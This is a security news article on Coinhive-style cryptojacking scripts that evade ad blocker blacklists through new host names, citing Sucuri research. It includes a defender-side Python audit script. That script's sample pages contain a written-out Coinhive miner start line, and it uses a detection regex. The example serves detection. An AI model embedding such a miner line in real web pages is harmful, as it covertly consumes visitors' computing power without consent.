Malicious Crypto Mining Continues to Evolve and Evade Ad Blockers

Anyone who has kept an eye on the cryptocurrency industry will know that malicious crypto mining is becoming a very real problem. We are not just talking about cryptojacking here, but also the growing number of websites embedding Monero mining scripts with or without user consent. Even though ad blockers alleviate most of these concerns, it has become evident the problem is simply taking a different form.

Malicious Cryptocurrency Mining is Evolving

While we have noted before that cryptojacking is becoming increasingly popular in Sweden, that is only one face of the malicious crypto mining threat. That’s because the number of websites embedding the Coinhive and similar mining scripts is still growing. While it may seem counterproductive at first, there appears to be a profitable business model behind this idea.

According to new research by Sucuri, the number of compromised websites running various iterations of the Coinhive API is becoming quite worrisome. At the same time, the company also notes criminals are getting a lot craftier when it comes to embedding this code into such websites and content management systems. That is not a positive sign by any stretch of the imagination.

What makes this trend so worrisome is that these altered versions of the Coinhive script are also capable of bypassing whatever ad blocker setup a user may have in place. It goes to show there is only so much one can achieve by using an ad blocker, and it remains to be seen whether a more robust countermeasure will come around at some point. There has also been an increasing use of proxies and services which operate in a manner similar to Coinhive.

Some sites even engage in a more devious form of malicious crypto mining altogether. More specifically, they can change between different versions of their miners to increase their exposure and ensure optimal revenue generation at all times. All it takes is a different host name to bypass virtually all ad blocker blacklists associated with Coinhive right now, indicating there is still a very long way to go until this threat is completely nullified.
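To make the blacklist gap concrete from a site owner's or defender's side, the following added example (not from Sucuri's research or the original article) audits page markup two ways: by script host name, as an ad blocker blacklist does, and by looking for the Coinhive miner constructor in the page itself. The blacklist, the sample pages and the `example.invalid` hosts are constructed for illustration, and the content check is a heuristic that a renamed or obfuscated miner would also evade.

```python
import re
from urllib.parse import urlparse

# Constructed one-entry blacklist standing in for an ad blocker's host list.
HOST_BLACKLIST = {"coinhive.com"}

SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']([^"\']+)["\']', re.I)
# Miner constructors exposed by Coinhive's public JavaScript API.
MINER_INIT = re.compile(r'\bCoinHive\.(?:Anonymous|User)\s*\(')

# Constructed sample pages; hosts under example.invalid are placeholders.
INIT = "<script>new CoinHive.Anonymous('SITE_KEY', {throttle: 0.7}).start();</script>"
PAGES = {
    "original": '<script src="https://coinhive.com/lib/coinhive.min.js"></script>' + INIT,
    "rehosted": '<script src="https://static.example.invalid/lib/c.js"></script>' + INIT,
    "clean": '<script src="https://cdn.example.invalid/jquery.min.js"></script>',
}

def script_hosts(html):
    """Hostnames of every external script the page loads."""
    return [urlparse(src).hostname or "" for src in SCRIPT_SRC.findall(html)]

def blocked_by_hostname(html):
    """True if any script host is a blacklisted domain or a subdomain of one."""
    return any(h == b or h.endswith("." + b)
               for h in script_hosts(html) for b in HOST_BLACKLIST)

def flagged_by_content(html):
    """True if the page itself calls a Coinhive miner constructor."""
    return bool(MINER_INIT.search(html))

def audit(pages):
    """Map page name -> (hostname blacklist hit, content signature hit)."""
    return {name: (blocked_by_hostname(html), flagged_by_content(html))
            for name, html in pages.items()}

if __name__ == "__main__":
    for name, (by_host, by_content) in audit(PAGES).items():
        print(f"{name:9} hostname={by_host!s:5} content={by_content}")
```

The "rehosted" page is the case the article describes: the same miner served from a different host name passes the hostname check and is only caught by inspecting what the page actually runs.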

It is evident consumers will need to remain vigilant when it comes to addressing these problems. While an ad blocker blacklist is a must, constantly monitoring one’s overall CPU usage is still advised at this time. Since malicious crypto mining uses 30% or more of one’s CPU power at all times, it should not be much of a problem to keep an eye on these numbers. Unfortunately, a lot of miners are now throttled in order to go undetected for longer periods of time.

In the end, it is safe to say the malicious crypto mining industry is still evolving and will continue to do so for quite some time. Defenders and security companies will need to come up with new and viable solutions fairly quickly, which is always a challenge. Ad blockers and web blocking are two valuable tools for all consumers, but neither option is perfect by any means.